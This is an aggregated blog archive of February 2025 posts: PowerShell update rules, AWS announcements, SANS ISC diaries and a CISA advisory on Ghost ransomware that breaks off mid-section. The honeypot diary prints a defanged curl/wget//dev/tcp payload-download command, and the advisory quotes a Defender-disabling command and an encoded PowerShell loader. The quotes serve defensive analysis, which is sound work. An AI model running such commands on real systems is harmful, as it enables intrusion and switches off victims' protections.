Monthly Archives: February 2025

Powershell

Microsoft Update changes for PowerShell 7

Leave a comment
This post was originally published on this site

Microsoft Update (MU) changes for PowerShell 7

It has been a while since we’ve updated folks on the latest behaviors for Microsoft Update! This
post gives some background on Microsoft Update, explains our update rules, and announces our plans
for updating your installs of PowerShell 7.2.

About Microsoft Update

Microsoft Update (MU) is a service that provides automatic updates for Microsoft products and services. We first started using MU in PowerShell 7.2. MU provides a convenient way to automatically update PowerShell 7, which ensures you can control your update schedule, test it against your environment, and scale across your enterprise with ease.

Enabling MU

During MSI installation, two checkboxes control update settings:

  • Enable updates for PowerShell through Microsoft Update or WSUS (recommended)
    Allows the system to receive updates for PowerShell 7 through Microsoft Update, Windows Server
    Update Services (WSUS), or System Center Configuration Manager (SCCM).
  • Enable Microsoft Update when I check for updates (recommended)
    Permits the system to receive updates for all supported Microsoft software, not just Windows.

We recommend that you select both options to ensure comprehensive update coverage.

If you want to set these options while installing PowerShell from the command line, you can find
detailed instructions in the PowerShell documentation.

Update Availability

After we release a new PowerShell version, it can take up to two weeks before the update is
available through Microsoft Update. We strive to publish the update no later than 2 weeks after the
GitHub release, but there is no guarantee. There may be circumstances that delay the update. If you
need the update before it’s available via MU, you can download it directly from the
PowerShell Releases page on GitHub.

What is the expected behavior of MU?

We defined the rules for updates in an intentional way to ensure that users who are using LTS
versions stay on LTS versions. This means that you might not be updated to the latest version of
PowerShell 7 when you expected.

These are the rules for updates:

  • If you are running 7.4 (LTS), you will receive updates to 7.4 (LTS)
  • If you are running 7.5 (stable), you will receive updates to 7.5 (stable)
  • If you are running any preview or release candidate (rc) version, you will receive updates to next
    latest preview version as they come out.

We will never update an LTS version to a stable non-LTS version, like 7.4 to 7.5. However, a stable
non-LTS release WILL be upgraded to the higher LTS release when support for the stable release
ends. The only time we update an LTS version to a different version would be when an LTS version is
out of support. For example, we will update 7.4 to 7.6 (next LTS) once 7.4 goes out of support.

Preview versions will never be updated to the latest stable version. Instead, we will update you to
the latest preview release. This means if you are on 7.5-rc.1 you will be updated to 7.6-preview.2
(since preview.1 was skipped) instead of 7.5.

NOTE

Beginning March 14, 2025, we will be updating users who are on 7.2 to 7.4.

Helpful Links

Hopefully this post helps you understand the MU process. If you want more information about our MU
release process, PowerShell releases, or the PowerShell Support Lifecycle, check out the following
articles.

Feedback

As always, we look forward to your feedback. You can provide feedback via GitHub Issues.

Thank you so much!

Steven Bucher

PM on the PowerShell Team

The post Microsoft Update changes for PowerShell 7 appeared first on PowerShell Team.

Security

Njrat Campaign Using Microsoft Dev Tunnels, (Thu, Feb 27th)

Leave a comment
This post was originally published on this site

I spotted new  Njrat[1] samples that (ab)use the Microsoft dev tunnels[2] service to connect to their C2 servers. This is a service that allows developers to expose local services to the Internet securely for testing, debugging, and collaboration. It provides temporary, public, or private URLs that will enable remote access to a development environment without deploying code to production. Dev tunnels create a secure, temporary URL that maps to a local service running on your machine, they work across firewalls and NAT, and their access can be restricted. This is a service similar to the good old ngrok[3].

Security

[Guest Diary] Malware Source Servers: The Threat of Attackers Using Ephemeral Ports as Service Ports to Upload Data, (Wed, Feb 26th)

Leave a comment
This post was originally published on this site

[This is a Guest Diary by Robin Zaheer, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

During my time as an intern with SANS Internet Storm Center [2], my DShield honeypot has seen a variety of attacks that prove to be interesting case studies. Most commonly, I have seen thousands upon thousands of password guessing attacks, for which the ISC provides a nifty webpage [3] that displays the top source IPs, usernames, and passwords used in said attacks observed by my honeypot for SSH/Telnet. Here is a snapshot of that page:


Figure 1: Data from my DShield honeypot on top source IPs, passwords, and usernames used in SSH login attempts for the current day.

 

These attacks are most certainly worth studying, but I think the attacks that occur after the attackers succeed in their password guessing draw my interest the most. After all, attacker behavior is most easily studied when they are given the access necessary to attempt what they mean to do within a target system. The attack I wish to focus on today utilizes a cloud IP that has remained undetected by malicious IP identifiers. It started with the following password guessing attack:


Figure 2: Excerpt from cowrie JSON log detailing successful password guessing attack from source IP %%ip:8.133.192.98%%.

 

The attack then went as follows:


Figure 3: TTY log generated by SSH session from Figure 2 and accessed using playlog command. Displays cowrie-interpreted inputs and command line outputs.

 

This attack took eight seconds, or thirteen if you include the time it took for the attacker to log in with the password guessing attack. In that time, a very complex command is inputted using nohup. The whole command is worth dissecting to understand what the attacker is attempting to do, but I will focus on the following defanged segment of that command:

curl hxxp[://]140[.]143[.]196[.]172[:]60102/linux -o /tmp/TTqYvYlyMT; if [ ! -f /tmp/TTqYvYlyMT ]; then wget hxxp[://]140[.]143[.]196[.]172[:]60102/linux -O /tmp/TTqYvYlyMT; fi; if [ ! -f /tmp/TTqYvYlyMT ]; then exec 6<>/dev/tcp/140[.]143[.]196[.]172/60102 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/TTqYvYlyMT

 

This piece of code tries to connect to and download data from another IP address three different ways: curl, wget, and 6<>/dev/tcp. The commonality between them is some version of trying to connect with the URL hxxp[://]140[.]143[.]196[.]172[:]60102/linux and writing the response into a file. This has struck me as the most interesting piece of the entire attack, as it entails connecting to the IP %%ip:140.143.196.172%% with HTTP, but through the ephemeral %%port:60102%% instead of %%port:80%% or another common service port. However, when I attempted to gather information about this IP’s past behavior, I got little information. See the table below:

Results Shodan [4] GreyNoise [5] AbuseIPDB [6] SANS ISC [7]
Malicious? No Results No results 0% Confidence of Abuse Risk 0
Reported Activity N/A N/A Three reports of SSH activity on 13 July 2024 No reports, listed on Port 22 Scanner feed between 13-15 July 2024

Figure 4: Results of searching for the IP the attacker attempted to download files from.

 

What is known about this IP is that it is based in Shanghai, China, and is owned by Tencent Cloud Computing Co., Ltd [6][7]. Even the ISC has no reports on this IP, only listing it in the Port 22 Scanner feed from six months ago [7], which is also the only time when AbuseIPDB reported potentially malicious activity from the IP [7].

I believe this means that the server tied to this IP is not normally used for common port scanning; it is only used as a location for attackers to access their malware and download to a compromised system. As of 17 January, 2025, what little information there is about this IP comes from a period of time it was used as an attacking system, whereas now it is a place of access for malware files. Essentially, this host is not an actively malicious system, but it remains a passive threat that aids threat actors in their attacks when needed. This could also make tracking down the stored malware much more difficult to identify and classify, especially at scale. With automated and wide-ranging web scanners like Shodan and GreyNoise failing to identify this threat, many more systems just like it can run under the radar until an analyst personally identifies its purpose. By running a service through an ephemeral port, web scanners are likely to not include that port in the range of ports that they scan on any given host. Additionally, the use of a nonstandard port for HTTP implies that the ability to connect to the server is tied to a service that the attacker crafted or manipulated for control, and that the opening of those ports are temporary(and therefore much more difficult to catch by web scanner), unlike the common service ports.There are examples of actively running HTTP services on malicious systems using nonstandard ports, see below:
 


Figure 5: Snapshot of HTTP service responses on nonstandard ports. Sourced from Shodan query for IP %%ip:220.180.76.126%%. 

 

While the ports for the HTTP services shown in Figure 5 are numbered below %%port:10000%%, the TCP port used in the attack is %%port:60102%%. This explains why Shodan would not be able to see the service, even if the service was actively running. According to the founder of Shodan(username “achillean”), the web scanner scans from a list of ports for all public IPv4 addresses [8]. That list of ports, pulled from Shodan’s API, includes only a fraction of all ports and does not include %%port:60102%% despite including some port numbers typically reserved for ephemeral port usage [9]. It is also worth noting that these responses were logged on certain days based on the date of the response headers, but have not given a more recent response, likely meaning that the services are not active at all times. GreyNoise, on the other hand, would never detect activity for the host of %%ip:140.143.196.172%% due to the way it collects data. According to its creator, it utilizes honeypot servers placed on several cloud providers to collect data much like how DShield collects data, logging access attempts and port scanning [10][11]. GreyNoise passively collects activity, so unless a threat actor attempts to attack one of their honeypots, activity like the above attack would not be logged. For comparison, GreyNoise does label the attacker’s originating IP %%ip:8.133.192.98%% as malicious, including tagging it for SSH connection attempts and SSH bruteforce, which follows the method for this attack [12].

The best way to combat this attack method is to lock down the target system’s inbound and outbound connections, limiting the scope to authorized addresses. Blocking HTTP traffic over unconventional ports should be sufficient to prevent this attack, but it does not safeguard against the malware that would be downloaded and may need the use of application firewalls or endpoint IDS/IPS systems. Also, one may prevent unauthorized access to the target system by protecting against password guessing attacks. This can be achieved by targeting both the credentials on the host and the source IPs attempting to log in. All host account credentials would need password complexity requirements to prevent use of common passwords, and any redundant or unused accounts must be pruned. For example, the credentials used to login in Figure 1 would need to change to something more complex, and the ability to login as root through SSH should be limited or removed. Source IPs can be limited with firewall configuration, such as using iptables for Linux systems. Using daemons like Fail2ban to monitor and ban source IPs with consistent login failures are also effective deterrents of password guessing attacks. The best way to catch the malicious files would be to monitor for file downloads through anomalous connections, such as strange protocol/port pairings. This is easily done with unencrypted protocols like HTTP, but for encrypted protocols like HTTPS, a decryption step would need to be implemented to catch the files in transit. A tool that markets itself as being sufficient at detecting services such as HTTP using nonstandard ports is Censys’s Universal Internet DataSet on their attack surface manager [13]. Once configured, the “automatic protocol detection” feature would be able to detect and alert a range of protocols that are sending/receiving on a nonstandard port.

Ultimately the attack itself is easy to avoid. However, if using a nonstandard port as a service port becomes more commonplace, then it may also become more difficult for cybersecurity professionals to perform discovery in incident response. If the web monitoring services are not catching this utilization of servers, the responsibility falls upon the analyst to identify and mitigate the threat. I hope that this use of ephemeral ports as service ports will be identified and addressed by the IP abuse monitors in the near future, but in the meantime, we must remain aware as analysts of this threat and use tools like Censys to combat it.

 

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://isc.sans.edu
[3] https://www.dshield.org/mysshreports/
[4] https://www.shodan.io/search?query=140.143.196.172
[5] https://viz.greynoise.io/ip/140.143.196.172
[6] https://www.abuseipdb.com/check/140.143.196.172
[7] https://isc.sans.edu/ipinfo/140.143.196.172
[8] https://news.ycombinator.com/item?id=27613813
[9] https://api.shodan.io/shodan/ports
[10] https://www.csoonline.com/article/565406/greynoise-knowing-the-difference-between-benign-and-malicious-internet-scans.html
[11] https://www.slideshare.net/slideshow/the-background-noise-of-the-internet/86816394
[12] https://viz.greynoise.io/ip/8.133.192.98
[13] https://censys.com/finding-non-standard-port-protocol-pairings-with-censys-asm/

 

 


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS

Anthropic’s Claude 3.7 Sonnet hybrid reasoning model is now available in Amazon Bedrock

Leave a comment
This post was originally published on this site

Amazon Bedrock is expanding its foundation model (FM) offerings as the generative AI field evolves. Today, we’re excited to announce the availability of Anthropic’s Claude 3.7 Sonnet foundation model in Amazon Bedrock. As Anthropic’s most intelligent model to date, Claude 3.7 Sonnet stands out as their first hybrid reasoning model capable of producing quick responses or extended thinking, meaning it can work through difficult problems using careful, step-by-step reasoning. Additionally, today we are adding Claude 3.7 Sonnet to the list of models used by Amazon Q Developer. Amazon Q is built on Bedrock, and with Amazon Q you can use the most appropriate model for a specific task such as Claude 3.7 Sonnet, for more advanced coding workflows that enable developers to accelerate building across the entire software development lifecycle.

Key highlights of Claude 3.7 Sonnet
Here are several notable features and capabilities of Claude 3.7 Sonnet in Amazon Bedrock.

The first Claude model with hybrid reasoning – Claude 3.7 Sonnet takes a different approach to how models think. Instead of using separate models—one for quick answers and another for solving complex problems—Claude 3.7 Sonnet integrates reasoning as a core capability within a single model. This combination is more similar to how the human brains works. After all, we use the same brain whether we’re answering a simple question or solving a difficult puzzle.

The model has two modes—standard and extended thinking mode—which can be toggled in Amazon Bedrock. In standard mode, Claude 3.7 Sonnet is an improved version of Claude 3.5 Sonnet. In extended thinking mode, Claude 3.7 Sonnet takes additional time to analyze problems in detail, plan solutions, and consider multiple perspectives before providing a response, allowing it to make further gains in performance. You can control speed and cost by choosing when to use reasoning capabilities. Extended thinking tokens count towards the context window and are billed as output tokens.

Anthropic’s most powerful model for coding – Claude 3.7 Sonnet is state-of-the art for coding, excelling in understanding context and creative problem solving, and according to Anthropic, achieves an industry-leading 70.3% for standard mode on SWE-bench Verified. Claude 3.7 Sonnet also performs better than Claude 3.5 Sonnet across the majority of benchmarks. These enhanced capabilities make Claude 3.7 Sonnet ideal for powering AI agents and complex workflows.

Claude 3.7 Sonnet benchmarks

Source: https://www.anthropic.com/news/claude-3-7-sonnet

Over 15x longer output capacity than its predecessor – Compared to Claude 3.5 Sonnet, this model offers significantly expanded output length. This enhanced capacity is particularly useful when you explicitly request more detail, ask for multiple examples, or request additional context or background information. To achieve long outputs, try asking for a detailed outline (for writing use cases, you can specify outline detail down to the paragraph level and include word count targets). Then, ask for the response to index its paragraphs to the outline and reiterate the word counts. Claude 3.7 Sonnet supports outputs up to 128K tokens long (up to 64K as generally available and up to 128K as a beta).

Adjustable reasoning budget – You can control the budget for thinking when you use Claude 3.7 Sonnet in Amazon Bedrock. This flexibility helps you weigh the trade-offs between speed, cost, and performance. By allocating more tokens to reasoning for complex problems or limiting tokens for faster responses, you can optimize performance for your specific use case.

Claude 3.7 Sonnet in action
As for any new model, I have to request access in the Amazon Bedrock console. In the navigation pane, I choose Model access under Bedrock configurations. Then, I choose Modify model access to request access for Claude 3.7 Sonnet.

Model access in Amazon Bedrock

To try Claude 3.7 Sonnet, I choose Chat / Text under Playgrounds in the navigation pane. Then I choose Select model and choose Anthropic under the Categories and Claude 3.7 Sonnet under the Models. To enable the extended thinking mode, I toggle Model reasoning under Configurations. I type the following prompt, and choose Run:

You're the manager of a small restaurant facing these challenges:

Three staff members called in sick for tonight's dinner service
You're expecting a full house (80 seats)
There's a large party of 20 coming at 7 PM
Your main chef is available but two kitchen helpers are among those who called in sick
You have 2 regular servers and 1 trainee available
How would you:

Reorganize the available staff to handle the situation
Prioritize tasks and service
Determine if you need to make any adjustments to reservations
Handle the large party while maintaining service quality
Minimize negative impact on customer experience
Explain your reasoning for each decision and discuss potential trade-offs


Chat / Text playground

Here’s the result with an animated image showing the reasoning process of the model.

Testing Claude 3.7 Sonnet reasoning

To test image-to-text vision capabilities, I upload an image of a detailed architectural site plan created using Amazon Bedrock. I receive a detailed analysis and reasoned insights of this site plan.

Claude 3.7 Sonnet can also be accessed through AWS SDK by using Amazon Bedrock API. To learn more about Claude 3.7 Sonnet’s features and capabilities, visit the Anthropic’s Claude in Amazon Bedrock product detail page.

Get started with Claude 3.7 Sonnet today
Claude 3.7 Sonnet’s enhanced capabilities can benefit multiple industry use cases. Businesses can create advanced AI assistants and agents that interact directly with customers. In fields such as healthcare, it can assist in medical imaging analysis and research summarization, and financial services can benefit from its abilities to solve complex financial modeling problems. For developers, it serves as a coding companion that can review code, explain technical concepts, and suggest improvements across different languages.

Anthropic’s Claude 3.7 Sonnet is available today in the US East (N. Virginia), US East (Ohio), and US West (Oregon) Regions. Check the full Region list for future updates.

Claude 3.7 Sonnet is priced competitively and matches the price of Claude 3.5 Sonnet. For pricing details, refer to the Amazon Bedrock pricing page.

To get started with Claude 3.7 Sonnet in Amazon Bedrock, visit the Amazon Bedrock console and Amazon Bedrock documentation.

— Esra

Security

Unfurl v2025.02 released, (Mon, Feb 24th)

Leave a comment
This post was originally published on this site

I've been a big fan of Ryan Benson's unfurl[1] tool since he released it a little over 5 years ago. Unfurl is a tool that can parse/decode URLs including things like embedded timestamps and IP addresses. It can be run in gui form via a web browser or as a command-line tool (my preference). Well, last week, Ryan released an update to v2025.02[2,3] of unfurl and added the ability to decode BlueSky URLs (among other bugfixes). I've also updated my docker container[4] to run the command-line version of unfurl as well.

References:

1. https://dfir.blog/introducing-unfurl/

2. https://dfir.blog/unfurl-parses-obfuscated-ip-addresses/

3. https://github.com/obsidianforensics/unfurl

4. https://hub.docker.com/repository/docker/clausing/dfir-unfurl/general

—————
Jim Clausing, GIAC GSE #26
jclausing –at– isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS

AWS Weekly Roundup: Cloud Club Captain Applications, Formula 1®, Amazon Nova Prompt Engineering, and more (Feb 24, 2025)

Leave a comment
This post was originally published on this site

AWS Developer Day 2025, held on February 20th, showcased how to integrate responsible generative AI into development workflows. The event featured keynotes from AWS leaders including Srini Iragavarapu, Director Generative AI Applications and Developer Experiences, Jeff Barr, Vice President of AWS Evangelism, David Nalley, Director Open Source Marketing of AWS, along with AWS Heroes and technical community members. Watch the full event recording on Developer Day 2025.

Cloud Club

Applications are now open through March 6th for the 2025 AWS Cloud Clubs Captains program. AWS Cloud Clubs are student-led groups for post-secondary and independent students, 18 years old and over. Find a club near you on our Meetup page.

Last week’s launches
Here are some launches that got my attention:

Amplify Hosting announces support for IAM roles for server-side rendered (SSR) applications  AWS Amplify Hosting now supports AWS Identity and Access Management (IAM) roles for SSR applications, enabling secure access to AWS services without managing credentials manually. Learn more in the IAM Compute Roles for Server-Side Rendering with AWS Amplify Hosting blog.

AWS WAF enhances Data Protection and logging experience  AWS WAF expands its Data Protection capabilities allowing sensitive data in logs to be replaced with cryptographic hashes (e.g. ‘ade099751d2ea9f3393f0f’) or a predefined static string (‘REDACTED’) before logs are sent to WAF Sample Logs, Amazon Security Lake, Amazon CloudWatch, or other logging destinations.

Announcing AWS DMS Serverless comprehensive premigration assessments AWS Database Migration Service Serverless (AWS DMS Serverless) now supports premigration assessments for replications to identify potential issues before database migrations begin. The tool analyzes source and target databases, providing recommendations for optimal DMS settings and best practices.

Amazon ECS increases the CPU limit for ECS tasks to 192 vCPUs – Amazon Elastic Container Service (Amazon ECS) now supports CPU limits of up to 192 vCPU for ECS tasks deployed on Amazon Elastic Compute Cloud (Amazon EC2) instances, an increase from the previous 10 vCPU limit. This enhancement allows customers to more effectively manage resource allocation on larger Amazon EC2 instances.

AWS Network Firewall introduces automated domain lists and insightsAWS Network Firewall now provides automated domain lists and insights by analyzing 30 days of HTTP/S traffic. This helps create and maintain allow-list policies more efficiently, at no extra cost.

AWS announces Backup Payment Methods for invoices AWS now enables you to set up backup payment methods that automatically activate if primary payment fails. This helps prevent service interruptions and reduces manual intervention for invoice payments.

Get updated with all the announcements of AWS announcements on the What’s New with AWS? page.

Other AWS news
Here are additional noteworthy items:

AWS Partner Network: Essential training resources for ISV partners To help scale solutions effectively, AWS provides essential training resources for Software Vendors (ISVs) partners in four key areas: AWS Marketplace fundamentals, Foundational Technical Review (FTR), APN Customer Engagement (ACE) program and co-selling, and Partner funding opportunities.

How Formula 1® uses generative AI to accelerate race-day issue resolution Formula 1® (F1) uses Amazon Bedrock to speed up race-day issue resolution, reducing troubleshooting time from weeks to minutes through a chatbot that analyzes root causes and suggests fixes.

How Formula 1® uses generative AI to accelerate race-day issue resolution

Reducing hallucinations in LLM agents with a verified semantic cache using Amazon Bedrock Knowledge Bases This blog introduces a solution using Amazon Bedrock Knowledge Bases and Amazon Bedrock Agents to reduce Large language models (LLMs) hallucinations by implementing a verified semantic cache that checks queries against curated answers before generating new responses, improving accuracy and response times.

Reducing hallucinations in LLM agents with a verified semantic cache using Amazon Bedrock Knowledge Bases

Orchestrate an intelligent document processing workflow using tools in Amazon Bedrock This blog demonstrates an intelligent document processing workflow using Amazon Bedrock tools that combines Anthropic’s Claude 3 Haiku for orchestration and Anthropic’s Claude 3.5 Sonnet (v2) for analysis to handle structured, semi-structured, and unstructured healthcare documents efficiently.

From community.aws
Here are my personal favorites posts from community.aws:

Tracing Amazon Bedrock Agents Learn how to track and analyze Amazon Bedrock Agents workflows using AWS X-Ray for better observability, by Randy D.

Testing Amazon ECS Network Resilience with AWS FISThis article demonstrates how to test network resilience in Amazon ECS using AWS FIS with guidance from Amazon Q Developer, by Sunil Govindankutty

Stop Using Default Arguments in AWS Lambda Functions Discover why your AWS Lambda costs might be spiralling out of control due to a common Python programming practice, by Stuart Clark.

Amazon Nova Prompt Engineering on AWS: A Field Guide by Brooke A field guide for using Amazon Nova models, covering prompt engineering patterns and best practices on AWS, by Brooke Jamieson.

Amazon Nova Prompt Engineering on AWS: A Field Guide by Brooke

Creating Deployment Configurations for EKS with Amazon Q Amazon Q Developer helps create EKS deployments by providing templates and best practices for Kubernetes configs, by Ricardo Tasso.

Processing WhatsApp Multimedia with Amazon Bedrock Agents: Images, Video, and DocumentsI invite you to read my latest blog, which explains how to create a WhatsApp AI assistant using Amazon Bedrock and Amazon Nova models to process multimedia content such as images, videos, documents, and audio.

Processing WhatsApp Multimedia with Amazon Bedrock Agents: Images, Video, and Documents

Upcoming AWS events
Check your calendars and sign up for these upcoming AWS events:

AWS GenAI Lofts – GenAI Lofts offer collaborative spaces and immersive experiences for startups and developers. You can join in-person GenAI Loft San Francisco events such as Hands-on with Agentic Graph RAG Workshop (February 25), Unstructured Data Meetup SF (February 26 – 27) and AI Tinkerers – San Francisco – February 2025 Demos + Science Fair (February 27 – 28). GenAI Loft Berlin has events and workshops on February 24 to March 7 that you can’t miss!

AWS Community Days – Join community-led conferences that feature technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from around the world: Milan, Italy (April 2), Bay Area – Security Edition (April 4), Timișoara, Romania (April 10), and Prague, Czeh Republic (April 29).

AWS Innovate: Generative AI + Data – Join a free online conference focusing on generative AI and data innovations. Available in multiple geographic regions: APJC and EMEA (March 6), North America (March 13), Greater China Region (March 14), and Latin America (April 8).

AWS Summits – Join free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Register in your nearest city: Paris (April 9), Amsterdam (April 16), London (April 30), and Poland (May 5).

AWS re:Inforce – AWS re:Inforce (June 16–18) in Philadelphia, PA our annual learning event devoted to all things AWS cloud security. Registration opens in March, and be ready to join more than 5,000 security builders and leaders.

Create your AWS Builder ID and reserve your alias. Builder ID is a universal login credential that gives you access–beyond the AWS Management Console–to AWS tools and resources, including over 600 free training courses, community features, and developer tools such as Amazon Q Developer.

You can browse all upcoming in-person and virtual events.

That’s all for this week. Stay tuned for next week’s Weekly Roundup!

Eli

This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS!

Security

Tool update: sigs.py – added check mode, (Fri, Feb 21st)

Leave a comment
This post was originally published on this site

Over the years, I've written a number of scripts to make my life easier. One of those tools was sigs.py (which was a rewrite of an old perl script sigs.pl) to hash files. I wanted something portable that could potentially be a drop-in replacement for things like md5sum, sha1sum, etc. (and can do hashes like sha512, sha3-224, and sha3-384). I've even had cases where my python script ran faster than those Linux tools. Anyway, in some recent cases I've been working on, I've been getting manifests with hashes and to validate that I got good copies, I wanted to verify the hashes. Sometimes I was getting md5s, sometimes, sha1s, sometimes sha256s. On Linux, md5sum, sha1sum, sha256sum, etc. have the -c switch to do the checking, but my script did not have that, so I took an hour over a weekend recently and I added that capability. The script determines which hash to use based on the length of the hash it finds in the text file, so it can check any of the hashes it can calculate.

And even, SHA3-384

Hopefully others find this as useful as I do. The script can be found in my scripts repo[1] or here[2] directly.

References:

1. http://github.com/clausing/scripts

2. http://raw.githubusercontent.com/clausing/scripts/refs/heads/master/sigs.py

—————
Jim Clausing, GIAC GSE #26
jclausing –at– isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

Using ES|QL in Kibana to Queries DShield Honeypot Logs, (Thu, Feb 20th)

Leave a comment
This post was originally published on this site

With the Elastic released of version 8.17.0, it included "The technical preview of new MATCH and query string (QSTR) functions in ES|QL makes log searches easier and more intuitive."[1] With this released, I started exploring some of the many options available with ES|QL in Kibana [2], enabled by default, to do various types of queries to quickly summarize data, outside of the default or custom dashboards.

Security

#StopRansomware: Ghost (Cring) Ransomware

Leave a comment
This post was originally published on this site

Summary

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025.

Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.

Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.

Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet facing servers. Ghost actors exploit well known vulnerabilities and target networks where available patches have not been applied.

The FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents.

Download the PDF version of this report:

AA25-050A #StopRansomware: Ghost (Cring) Ransomware
(PDF, 735.18 KB
)

For a downloadable copy of IOCs, see:

AA25-050A STIX XML
(XML, 78.67 KB
)

AA25-050A STIX XML (Additional IOCs)
(XML, 74.01 KB
)

AA25-050A STIX JSON
(JSON, 68.47 KB
)

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16.1. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access

The FBI has observed Ghost actors obtaining initial access to networks by exploiting public facing applications that are associated with multiple CVEs [T1190]. Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473CVE-2021-34523, and CVE-2021-31207— commonly referred to as the ProxyShell attack chain).

Execution

Ghost actors have been observed uploading a web shell [T1505.003] to a compromised server and leveraging Windows Command Prompt [T1059.003] and/or PowerShell [T1059.001] to download and execute Cobalt Strike Beacon malware [T1105] that is then implanted on victim systems. Despite Ghost actors’ malicious implementation, Cobalt Strike is a commercially available adversary simulation tool often used for the purposes of testing an organization’s security controls.

Persistence

Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day. However, Ghost actors sporadically create new local [T1136.001] and domain accounts [T1136.002] and change passwords for existing accounts [T1098]. In 2024, Ghost actors were observed deploying web shells [T1505.003] on victim web servers.

Privilege Escalation

Ghost actors often rely on built in Cobalt Strike functions to steal process tokens running under the SYSTEM user context to impersonate the SYSTEM user, often for the purpose of running Beacon a second time with elevated privileges [T1134.001].

Ghost actors have been observed using multiple open-source tools in an attempt at privilege escalation through exploitation [T1068] such as “SharpZeroLogon,” “SharpGPPPass,” “BadPotato,” and “GodPotato.” These privilege escalation tools would not generally be used by individuals with legitimate access and credentials. 

See Table 1 for a descriptive listing of tools.

Credential Access

Ghost actors use the built in Cobalt Strike function “hashdump” or Mimikatz [T1003] to collect passwords and/or password hashes to aid them with unauthorized logins and privilege escalation or to pivot to other victim devices.

Defense Evasion

Ghost actors used their access through Cobalt Strike to display a list of running processes [T1057] to determine which antivirus software [T1518.001] is running so that it can be disabled [T1562.001]. Ghost frequently runs a command to disable Windows Defender on network connected devices. Options used in this command are: Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend.

Discovery

Ghost actors have been observed using other built-in Cobalt Strike commands for domain account discovery [T1087.002], open-source tools such as “SharpShares” for network share discovery [T1135], and “Ladon 911” and “SharpNBTScan” for remote systems discovery [T1018]. Network administrators would be unlikely to use these tools for network share or remote systems discovery.

Lateral Movement

Ghost actors used elevated access and Windows Management Instrumentation Command-Line (WMIC) [T1047] to run PowerShell commands on additional systems on the victim network— often for the purpose of initiating additional Cobalt Strike Beacon infections. The associated encoded string is a base 64 PowerShell command that always begins with: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA… [T1132.001][T1564.003].

This string decodes to “$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“” and is involved with the execution of Cobalt Strike in memory on the target machine.

In cases where lateral movement attempts are unsuccessful, Ghost actors have been observed abandoning an attack on a victim.

Exfiltration

Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked. The FBI has observed limited downloading of data to Cobalt Strike Team Servers [T1041]. Victims and other trusted third parties have reported limited uses of Mega.nz [T1567.002] and installed web shells for similar limited data exfiltration. Note: The typical data exfiltration is less than hundreds of gigabytes of data.

Command and Control

Ghost actors rely heavily on Cobalt Strike Beacon malware and Cobalt Strike Team Servers for command and control (C2) operations, which function using hypertext transfer protocol (HTTP) and hypertext transfer protocol secure (HTTPS) [T1071.001]. Ghost rarely registers domains associated with their C2 servers. Instead, connections made to a uniform resource identifier (URI) of a C2 server, for the purpose of downloading and executing Beacon malware, directly reference the C2 server’s IP address. For example, http://xxx.xxx.xxx.xxx:80/Google.com where xxx.xxx.xxx.xxx represents the C2 server’s IP address.

